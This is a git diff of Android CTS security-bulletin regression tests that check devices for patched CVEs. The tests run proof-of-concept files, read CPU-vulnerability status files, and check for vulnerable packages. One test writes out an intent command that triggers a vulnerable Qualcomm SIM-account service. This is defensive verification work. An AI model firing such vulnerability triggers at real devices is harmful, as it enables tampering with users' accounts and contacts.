+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0385 extends SecurityTestCase {
+
+ /**
+ * b/150160041
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0385() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0385.xmf", "cve_2020_0385.info"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0385",
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java
deleted file mode 100644
index 81100e6..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java
+++ /dev/null
@@ -1,46 +0,0 @@
-/**
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
-import static org.junit.Assume.assumeTrue;
-import static org.junit.Assume.assumeThat;
-import static org.hamcrest.CoreMatchers.equalTo;
-import static org.junit.Assert.*;
-
-@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0461 extends SecurityTestCase {
-
- /**
- * b/162741784
- */
- @Test
- @SecurityTest(minPatchLevel = "2020-12")
- public void testPocCVE_2020_0461() throws Exception {
- assumeTrue(containsDriver(getDevice(),
- "/sys/devices/system/cpu/vulnerabilities/meltdown"));
- String meltdown = AdbUtils.runCommandLine(
- "cat /sys/devices/system/cpu/vulnerabilities/meltdown", getDevice());
- assertFalse(meltdown.startsWith("Vulnerable"));
- assertTrue(meltdown.startsWith("Not affected") ||
- meltdown.startsWith("Mitigation"));
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java
deleted file mode 100644
index fe42a0b..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java
+++ /dev/null
@@ -1,46 +0,0 @@
-/**
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
-import static org.junit.Assume.assumeTrue;
-import static org.junit.Assert.*;
-
-@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0462 extends SecurityTestCase {
-
- /**
- * b/169161709
- */
- @Test
- @SecurityTest(minPatchLevel = "2020-12")
- public void testPocCVE_2020_0462() throws Exception {
- assumeTrue(containsDriver(getDevice(),
- "/sys/devices/system/cpu/vulnerabilities/spec_store_bypass"));
- String spec_store_bypass = AdbUtils.runCommandLine(
- "cat /sys/devices/system/cpu/vulnerabilities/spec_store_bypass", getDevice());
- assertFalse(spec_store_bypass.startsWith("Vulnerable"));
- assertTrue(spec_store_bypass.startsWith("Not affected") ||
- spec_store_bypass.startsWith("Mitigation"));
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
new file mode 100644
index 0000000..dd2aff8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeInstant;
+import android.platform.test.annotations.AppModeFull;
+import android.util.Log;
+import android.platform.test.annotations.SecurityTest;
+
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+
+import org.junit.After;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+/**
+ * Test that collects test results from test package android.security.cts.CVE_2021_0305.
+ *
+ * When this test builds, it also builds a support APK containing
+ * {@link android.sample.cts.CVE_2021_0305.SampleDeviceTest}, the results of which are
+ * collected from the hostside and reported accordingly.
+ */
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0305 extends BaseHostJUnit4Test {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0305";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "CVE-2021-0305.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-09")
+ @AppModeFull
+ public void testRunDeviceTestsPassesFull() throws Exception {
+ installPackage();
+ Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testClick"));
+ }
+
+ private void installPackage() throws Exception {
+ installPackage(TEST_APP, new String[0]);
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
new file mode 100644
index 0000000..3d3f4a8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0330 extends SecurityTestCase {
+
+ /**
+ * b/170732441
+ * Vulnerability Behaviour: SIGSEGV in storaged
+ */
+ @SecurityTest(minPatchLevel = "2021-02")
+ @Test
+ public void testPocCVE_2021_0330() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2021-0330", getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns("storaged");
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java
new file mode 100644
index 0000000..2160aca
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0393 extends SecurityTestCase {
+
+ /**
+ * b/168041375
+ * Vulnerability Behavior: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0393() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runProxyAutoConfig("cve_2021_0393", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
new file mode 100644
index 0000000..3df46a7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertTrue;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0396 extends SecurityTestCase {
+
+ /**
+ * b/160610106
+ * Vulnerability Behaviour: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0396() throws Exception {
+ AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
new file mode 100644
index 0000000..935b601
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0430 extends SecurityTestCase {
+
+ /**
+ * b/178725766
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0430() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
new file mode 100644
index 0000000..25802a0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0439 extends SecurityTestCase {
+
+ /**
+ * b/174243830
+ * Vulnerability Behaviour: SIGSEGV in system_server
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0439() throws Exception {
+ String processPatternStrings[] = {"system_server"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0439", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
deleted file mode 100644
index d97c4db..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
+++ /dev/null
@@ -1,228 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import com.android.tradefed.device.CollectingOutputReceiver;
-import com.android.tradefed.device.DeviceNotAvailableException;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceTestCase;
-import com.android.tradefed.device.BackgroundDeviceAction;
-
-import android.platform.test.annotations.RootPermissionTest;
-
-import java.io.BufferedOutputStream;
-import java.io.File;
-import java.io.FileOutputStream;
-import java.io.IOException;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.util.Scanner;
-import java.util.regex.Pattern;
-import java.util.regex.Matcher;
-import java.util.Map;
-import java.util.HashMap;
-import java.util.concurrent.ConcurrentHashMap;
-import com.android.ddmlib.MultiLineReceiver;
-import com.android.ddmlib.Log;
-import com.android.ddmlib.TimeoutException;
-import java.lang.ref.WeakReference;
-
-/**
- * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that
- * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an
- * instance per instance of SecurityTestCase and call start() and stop() matching to
- * SecurityTestCase setup() and teardown().
- */
-public class HostsideOomCatcher {
-
- private static final String LOG_TAG = "HostsideOomCatcher";
-
- private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = (long)(1.5 * 1024 * 1024); //1.5GB
- private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers =
- new ConcurrentHashMap<>();
- private static Map<String, Long> totalMemories = new ConcurrentHashMap<>();
-
- private boolean isLowMemoryDevice = false;
-
- private SecurityTestCase context;
-
- /**
- * test behavior when oom is detected.
- */
- public enum OomBehavior {
- FAIL_AND_LOG, // normal behavior
- PASS_AND_LOG, // skip tests that oom low memory devices
- FAIL_NO_LOG, // tests that check for oom
- }
- private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
- private boolean oomDetected = false; // accessed across threads
-
- public HostsideOomCatcher(SecurityTestCase context) {
- this.context = context;
- }
-
- /**
- * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal
- */
- private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException {
- // cache device TotalMem to avoid an adb shell for every test.
- String serial = device.getSerialNumber();
- Long totalMemory = totalMemories.get(serial);
- if (totalMemory == null) {
- String memInfo = device.executeShellCommand("cat /proc/meminfo");
- Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
- Matcher matcher = pattern.matcher(memInfo);
- if (matcher.find()) {
- totalMemory = Long.parseLong(matcher.group(1));
- } else {
- throw new RuntimeException("Could not get device memory total.");
- }
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "Device " + serial + " has " + totalMemory + "KB total memory.");
- totalMemories.put(serial, totalMemory);
- }
- return totalMemory;
- }
-
- /**
- * Start the hostside oom catcher thread for the test.
- * Match this call to SecurityTestCase.setup().
- */
- public synchronized void start() throws Exception {
- long totalMemory = getMemTotal(getDevice());
- isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
-
- // reset test oom behavior
- // Devices should fail tests that OOM so that they'll be ran again with --retry.
- // If the test OOMs because previous tests used the memory, it will likely pass
- // on a second try.
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- oomDetected = false;
-
- // Cache OOM detection in separate persistent threads for each device.
- WeakReference<BackgroundDeviceAction> reference =
- oomCatchers.get(getDevice().getSerialNumber());
- BackgroundDeviceAction oomCatcher = null;
- if (reference != null) {
- oomCatcher = reference.get();
- }
- if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) {
- AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice());
-
- oomCatcher = new BackgroundDeviceAction(
- "logcat -c && logcat OomCatcher:V *:S",
- "Oom Catcher background thread",
- getDevice(), new OomReceiver(getDevice()), 0);
-
- oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher));
- oomCatcher.start();
- }
- }
-
- /**
- * Stop the hostside oom catcher thread.
- * Match this call to SecurityTestCase.setup().
- */
- public static void stop(String serial) {
- WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial);
- if (reference != null) {
- BackgroundDeviceAction oomCatcher = reference.get();
- if (oomCatcher != null) {
- oomCatcher.cancel();
- }
- }
- }
-
- /**
- * Check every test teardown to see if the device oomed during the test.
- */
- public synchronized boolean isOomDetected() {
- return oomDetected;
- }
-
- /**
- * Return the current test behavior for when oom is detected.
- */
- public synchronized OomBehavior getOomBehavior() {
- return oomBehavior;
- }
-
- /**
- * Flag meaning the test will likely fail on devices with low memory.
- */
- public synchronized void setHighMemoryTest() {
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- }
-
- /**
- * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
- * intentionally OOMs the device.
- */
- public synchronized void setOomTest() {
- oomBehavior = OomBehavior.FAIL_NO_LOG;
- }
-
- private ITestDevice getDevice() {
- return context.getDevice();
- }
-
- /**
- * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot
- * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive.
- */
- class OomReceiver extends MultiLineReceiver {
-
- private ITestDevice device = null;
- private boolean isCancelled = false;
-
- public OomReceiver(ITestDevice device) {
- this.device = device;
- }
-
- @Override
- public void processNewLines(String[] lines) {
- for (String line : lines) {
- if (Pattern.matches(".*Low memory.*", line)) {
- // low memory detected, reboot device to clear memory and pass test
- isCancelled = true;
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "lowmemorykiller detected; rebooting device.");
- synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected
- oomDetected = true; // set HostSideOomCatcher var
- }
- try {
- device.nonBlockingReboot();
- device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- return; // we don't need to process remaining lines in the array
- }
- }
- }
-
- @Override
- public boolean isCancelled() {
- return isCancelled;
- }
- }
-}
-
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index 39b7ada..0895607 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -44,7 +44,6 @@
@Test
@SecurityTest(minPatchLevel = "2016-05")
public void testPocCVE_2015_1805() throws Exception {
- getOomCatcher().setHighMemoryTest();
AdbUtils.runPoc("CVE-2015-1805", getDevice(), TIMEOUT_NONDETERMINISTIC);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index 4367a61..835c1cf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -58,7 +58,6 @@
@Test
@SecurityTest(minPatchLevel = "2016-07")
public void testPocCVE_2016_3747() throws Exception {
- getOomCatcher().setHighMemoryTest();
AdbUtils.runPocAssertNoCrashes("CVE-2016-3747", getDevice(), "mediaserver");
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
index 1ec6d89..797e58d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
@@ -29,35 +29,6 @@
@RunWith(DeviceJUnit4ClassRunner.class)
public class Poc17_05 extends SecurityTestCase {
- /**
- * b/34277115
- */
- @Test
- @SecurityTest(minPatchLevel = "2017-05")
- public void testPocCVE_2017_0630() throws Exception {
- if (containsDriver(getDevice(), "/sys/kernel/debug/tracing/printk_formats")) {
- String printkFormats = AdbUtils.runCommandLine(
- "cat /sys/kernel/debug/tracing/printk_formats", getDevice());
- String[] pointerStrings = printkFormats.split("\n");
- assertNotKernelPointer(new Callable<String>() {
- int index;
- @Override
- public String call() {
- for (; index < pointerStrings.length; index++) {
- String line = pointerStrings[index];
- String pattern = "0x";
- int startIndex = line.indexOf(pattern);
- if (startIndex == -1) {
- continue;
- }
- return line.substring(startIndex + pattern.length());
- }
- return null;
- }
- }, null);
- }
- }
-
/*
* CVE-2016-5862
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
index 44b0d89..dc41d7c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -33,7 +33,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13286() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
}
@@ -44,7 +43,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13288() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice());
}
@@ -55,7 +53,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13289() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
index 6b51f0a..e3128f1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -33,7 +33,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13315() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
}
@@ -44,7 +43,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13312() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
index 172f0fc..64929d9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -35,4 +35,26 @@
AdbUtils.runPocAssertNoCrashes(
"CVE-2018-9424", getDevice(), "android\\.hardware\\.drm@\\d\\.\\d-service");
}
+
+ /*
+ * CVE-2017-18275
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testPocCVE_2017_18275() throws Exception {
+ String command =
+ "am startservice "
+ + "-n com.qualcomm.simcontacts/com.qualcomm.simcontacts.SimAuthenticateService "
+ + "-a android.accounts.AccountAuthenticator -e account_name cve_2017_18275";
+ String result = AdbUtils.runCommandLine(
+ "pm list packages | grep com.qualcomm.simcontacts", getDevice());
+ if (result.contains("com.qualcomm.simcontacts")) {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runCommandLine(command, getDevice());
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine(
+ "Authenticator: Add SIM account.*ContactsProvider: Accounts changed",
+ logcat);
+ }
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java
new file mode 100644
index 0000000..9c60f67
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class Poc19_04 extends SecurityTestCase {
+
+ /**
+ * CVE-2018-13895
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testPocCVE_2018_13895() throws Exception {
+ String result = AdbUtils.runCommandLine(
+ "pm list package com.suntek.mway.rcs.app.service",getDevice());
+ assertFalse(result.contains("com.suntek.mway.rcs.app.service"));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
index fe8c239..07f45db 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
@@ -133,8 +133,8 @@
}
testFile += bitness;
}
- File localFile = buildHelper.getTestFile(testFile);
CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile);
+ File localFile = buildHelper.getTestFile(testFile);
device.pushFile(localFile, remoteFile);
if (cleanup) {
filesToCleanup.add(remoteFile);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index 2b83077..d643084 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -20,6 +20,7 @@
import com.android.compatibility.common.util.ResultType;
import com.android.compatibility.common.util.ResultUnit;
import com.android.tradefed.build.IBuildInfo;
+import com.android.tradefed.config.Option;
import com.android.tradefed.testtype.IBuildReceiver;
import com.android.tradefed.testtype.IAbi;
import com.android.tradefed.testtype.IAbiReceiver;
@@ -58,7 +59,6 @@
private long kernelStartTime;
- private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this);
